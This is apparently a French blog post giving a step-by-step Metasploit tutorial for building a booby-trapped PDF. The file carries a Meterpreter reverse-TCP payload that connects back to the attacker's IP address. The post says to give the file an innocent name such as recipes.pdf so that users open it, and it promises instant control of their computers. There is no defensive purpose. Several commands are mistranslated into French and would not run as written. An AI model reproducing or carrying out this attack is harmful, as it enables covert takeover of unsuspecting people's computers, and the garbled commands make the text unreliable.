Comment intégrer une porte dérobée dans un PDF file❓

 
✨Comment intégrer une porte dérobée dans un PDF file❓


Etape 1)Lancer Metasploit

Étape 2) Trouver l'exploitation appropriée.

Je vais rechercher dans la base de données metasploits un exploit pour adobe pdf sur windows, en utilisant cette commande :

●Code:msf > search type:exploit platform:windows adobe pdf

Vous devriez voir l'exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", que nous allons utiliser :

●Code:msf > utiliser l'exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe

Étape 3) Définir la charge utile

J'utiliserai à nouveau la charge utile du meterpreter, car c'est l'une des charges utiles les plus puissantes dont nous disposons :

●Code:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp

Étape 4) Définir les options d'exploitation

Tout d'abord, affichez les options requises pour l'exploit :

●Code:msf > exploit (adobe_pdf_embedded_exe) > afficher les options

Vous pouvez voir que nous devons fournir un fichier PDF existant à l'option INFILENAME pour y intégrer la charge utile du meterpreter. Je l'appellerai "hemantexample.pdf" :

●Code : msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME example.pdf

L'option suivante est le nom du fichier de sortie, FILENAME. Changez-le en quelque chose d'innocent qui incitera les utilisateurs à l'ouvrir :
msf > exploiter (adobe_pdf_embedded_exe) > set FILENAME recipes.pdf

Enfin, nous devons préciser le LHOST, qui est notre adresse IP (celle des attaquants). La mienne est 192.168.1.8 :

●Code:msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.1.8

Étape 5) Exécution de l'exploit.

Maintenant que toutes les options sont définies, nous pouvons exécuter l'exploit comme ceci :

●Code : msf > exploit (adobe_pdf_embedded_exe) > exploit

Metasploit a créé un PDF nommé recipes.pdf qui contient l'auditeur Meterpeter. Maintenant, il suffit de demander aux utilisateurs d'ouvrir le pdf (Social Engineering à nouveau), et vous obtiendrez un contrôle instantané de leur ordinateur aussi simple qu'un putain de sourire :)


Merci de votre lecture, et visitez cette chaine Youtube : https://www.youtube.com/watch?v=XBRoY7aC_SU

Commentaires

Posts les plus consultés de ce blog

COMMENT AVOIR UN COMPTE CRUNCHYROLL A VIE ?

Les classes d’adresses IP & Masques sous réseaux [ 1er Partie ]

Comment Faire une attaque DDOS via Termux ?